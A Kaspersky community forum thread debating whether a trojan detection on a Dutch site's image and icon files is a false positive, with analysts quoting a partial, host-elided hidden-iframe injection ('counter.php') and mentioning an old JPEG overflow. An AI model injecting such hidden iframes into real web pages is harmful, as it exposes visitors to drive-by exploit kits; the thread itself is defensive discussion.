Kaspersky
Question

False Positive: HEUR:Trojan.Script.Generic

  • 8 December 2020
  • 22 replies
  • 770 views

Userlevel 1

hi,

Can this be checked? is it a false positive?

http://www.apport-vaals.nl/images/footer.jpg (Trojan.Script.Generic)
http://www.apport-vaals.nl/favicon.ico  (Trojan.Script.Generic)


22 replies

Userlevel 7
Badge +8

Welcome to Kaspersky Community.

 

Seems a FP:

 

https://www.virustotal.com/gui/url/053a73704ae38feec6c9d7ce1af17ddaa73b39f10c2e75ec7c15fea87c5482a1/detection

 

https://opentip.kaspersky.com/www.apport-vaals.nl/

 

I’ve sent the URL to K. analysts...

Userlevel 1

Thanks, i'm curious what it will reveal.

If it's a FP it should be removed from KIS dbase

 

Userlevel 7
Badge +8

Final verdict:

 

 

Userlevel 1

I'm not seeing that code it's not inside index file. And KIS is not complaining about it.

As my screeshot shows it's complaining about favicon.ico and footer.jpg

Userlevel 7
Badge +8

I sent Your words and this is the response:

 

 

Userlevel 1

I'm not the owner of that website. For a visitor there are two ways to check for

<iframe src="h

t="10”/>

"”

examine the HTML files in "Temporary Internet Files”

or

on page right click and choose "View page source” and search for that code.

I didn't find it!

 

And for second time KIS isn't reporting/complaining about  <iframe src="h t="10”/> "”

It's reporting/complaining and blocking about (see screenshot) favicon.ico and footer.jpg

both holding (Trojan.Script.Generic)

Userlevel 7
Badge +4

Hello,

The infected JPEG file has been removed in that site. This use a very old GDI++ vulnerability (MS04-028). The current system is immune to this vulnerability.

vulnerability information: Browse the picture, it is possible to overflow, and download a virus file in a iframe from the jpeg file specified by the Trojan grower, and execute it

Now you can access this website without any problem. The related infected jpeg file has been removed by website with a 404 response.

Could someone get the footer.jpg or favicon.ico from that website? Please pm me to send them to me, thanks.

Regards.

Userlevel 7
Badge +4

I'm not the owner of that website. For a visitor there are two ways to check for

<iframe src="h

t="10”/>

"”

examine the HTML files in "Temporary Internet Files”

or

on page right click and choose "View page source” and search for that code.

I didn't find it!

 

And for second time KIS isn't reporting/complaining about  <iframe src="h t="10”/> "”

It's reporting/complaining and blocking about (see screenshot) favicon.ico and footer.jpg

both holding (Trojan.Script.Generic)


Hello,

Those codes are at the button of the content of footer.jpg and favicon.ico file. not in html webpage code.

Regards.

Userlevel 7
Badge +9

Hello @Wesly.Zhang

Here’s the data:

 

 

 

 

 

 

 

https://youtu.be/cb0roWqRGOk

Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +4

Hello @Wesly.Zhang

Here’s the data:

 

 

 

 

 

 

 

https://youtu.be/cb0roWqRGOk

Thank you:pray_tone3:

Flood:whale: +:whale2:


Hello,

I know this situation. I don’t know who remove the infected jpeg file, website administrator or a bad guy or a security solution. If it is a bad guy who temporarily offline a malicious object, wait for the security product to remove the alarm of banning the URL, and then re-launch the malicious object, the security product will ban the related URL again. This is also a problem.

What can now ask KL is if the malicious object no longer exists, can the behavior of banning the URL be resolved ?

I will ask our KL chinese virus analyst. If there is any news, I will reply here.

Regards.

Userlevel 7
Badge +4

@harlan4096@René@Flood and Flood's wife

footer.jpg and favicon.ico is available for downloading in your side?

Regards.

Userlevel 7
Badge +9

Hello @Wesly.Zhang

Issue persists:

 

 

 

 

Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +4

Hello,

No detection is observed after deleting the picture. Thank you for your help.

New information from KL. It means this issue will be resolved. Waitting for new database update.

Regards.

Userlevel 7
Badge +9

Hello @Wesly.Zhang

Thank you for the update:ok_hand_tone3:

So, Kaspersky Lab are now acknowledging, the Heur:Trojan.Script.Generic detections for http://www.apport-vaals.nl/images/footer.jpg & http://www.apport-vaals.nl/favicon.ico , are false positives, is that correct?

Please let us know?

Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +4

Hello @Wesly.Zhang

Thank you for the update:ok_hand_tone3:

So, Kaspersky Lab are now acknowledging, the Heur:Trojan.Script.Generic detections for http://www.apport-vaals.nl/images/footer.jpg & http://www.apport-vaals.nl/favicon.ico , are false positives, is that correct?

Please let us know?

Thank you:pray_tone3:

Flood:whale: +:whale2:


Hello,

I think the answer is NO if footer.jpg and favicon.ico exists on the website server now. There is reason to believe that these two files may have malicious code. But above two infected files have gone. The detection should be correct in time. The answer is so simple and straightforward.

Regards.

Userlevel 1

As far as i know this is a 100% false positive (both files don't exist and are not served anymore)

So Kaspersky should remove it from dbase. A bit weird they add something to a dbase and NEVER check if it's still valid!

How reliable are they?

Simple NOT!

Userlevel 7
Badge +9

As far as i know this is a 100% false positive (both files don't exist and are not served anymore)

So Kaspersky should remove it from dbase. A bit weird they add something to a dbase and NEVER check if it's still valid! How reliable are they? Simple NOT!

@René

We raised a case with the Kaspersky Virus experts: 

This is the history: 

  • Dec 9th 2020, case logged, with the URLs you provided & the Kaspersky detections from our tests.
  • 11th Dec 2020 Kaspersky response:

No malicious software was found on the website "http://www.apport-vaals.nl". The malicious code was probably removed from the server.”

  • 11th Dec, 2020, our response:

Why are the alerts still happening?  Provided supporting data. 

  • Dec 14th 2020, Kaspersky response: our Virus Analysts have just replied:

Please note that the warning you received is not a false-alarm. The site is infected. Here is the malicious code:
iframe src="http://
...
counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/
If you are a webmaster, please remove the above code from the page. Also, we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

  • 14th Dec 2020, our response:

(1) Specifically, what does the malicious code do? 

(2) Does:
iframe src="http://
...
counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/

"steal passwords" ? 

(3) How exactly is that code malicious? 

  • 15th Dec, 2020, Kaspersky response:

You can find the article on iframe here: https://securelist.com/visit-from-an-old-friend-counter-php/57478/.

The domain used in iframes on the mentioned resource most likely use to deliver exploit packs on clients.

**********

:no_entry: Also, we wrote to apport-vaals.nl site administrators, they never responded:no_entry:

**********

Recommendations:

  • You log a case with Kaspersky Technical Support
  • Please share the advice you receive, from Kaspersky Technical/Virus experts, with the Community, when it’s available ?
  • Provide us with written advice, from apport-vaals.nl site administrators, that the code has been removed, we’ll continue with the issue & Kaspersky experts.

Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +4

As far as i know this is a 100% false positive (both files don't exist and are not served anymore)

So Kaspersky should remove it from dbase. A bit weird they add something to a dbase and NEVER check if it's still valid! How reliable are they? Simple NOT!

@René

We raised a case with the Kaspersky Virus experts: 

This is the history: 

  • Dec 9th 2020, case logged, with the URLs you provided & the Kaspersky detections from our tests.
  • 11th Dec 2020 Kaspersky response:

No malicious software was found on the website "http://www.apport-vaals.nl". The malicious code was probably removed from the server.”

  • 11th Dec, 2020, our response:

Why are the alerts still happening?  Provided supporting data. 

  • Dec 14th 2020, Kaspersky response: our Virus Analysts have just replied:

Please note that the warning you received is not a false-alarm. The site is infected. Here is the malicious code:
iframe src="http://
...
counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/
If you are a webmaster, please remove the above code from the page. Also, we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

  • 14th Dec 2020, our response:

(1) Specifically, what does the malicious code do? 

(2) Does:
iframe src="http://
...
counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/

"steal passwords" ? 

(3) How exactly is that code malicious? 

  • 15th Dec, 2020, Kaspersky response:

You can find the article on iframe here: https://securelist.com/visit-from-an-old-friend-counter-php/57478/.

The domain used in iframes on the mentioned resource most likely use to deliver exploit packs on clients.

**********

:no_entry: Also, we wrote to apport-vaals.nl site administrators, they never responded:no_entry:

**********

Recommendations:

  • You log a case with Kaspersky Technical Support
  • Please share the advice you receive, from Kaspersky Technical/Virus experts, with the Community, when it’s available ?
  • Provide us with written advice, from apport-vaals.nl site administrators, that the code has been removed, we’ll continue with the issue & Kaspersky experts.

Thank you:pray_tone3:

Flood:whale: +:whale2:


Hello,

counter.php…… Where is the php file?in a jpeg file? This site doesn’t use php language. just simple a  html static page. Instersting…... drink too much vodka? Dizzy? I suspect that what they(KL) see is different from what we see. Maybe yes, maybe not…...Only the god know.

Regards.

 

Userlevel 7
Badge +9

Hello,

I suspect that what they (KL) see is different from what we see.

 

Agreed Wesly, 

BUT, there is only so much bashing our heads against a brick wall, that we’re prepared to tolerate. 

The OP has the option to argue it out with Kaspersky Technical Support/Virus Lab Analysts, if they wish to. 

Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +5

Hi @Flood and Flood's wife , can you share the INC number with me? I will doublecheck.

Regards,

Igor

Userlevel 7
Badge +9

Hi @Flood and Flood's wife , can you share the INC number with me? I will doublecheck.

Regards,

Igor

Hello @Igor Kurzin,

Thank you for participating:pray_tone3:

Pm’d.

Note, we asked TS to close the case, as KVA were adamant the detections are legitimate & we’d had no response from the site admin.

Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +5

Hi all, 

The server has page 404 infected, it does not matter what is in the URL address, the malicious iframe is inserted with the 404 response. 

 

Regards,

Igor

Reply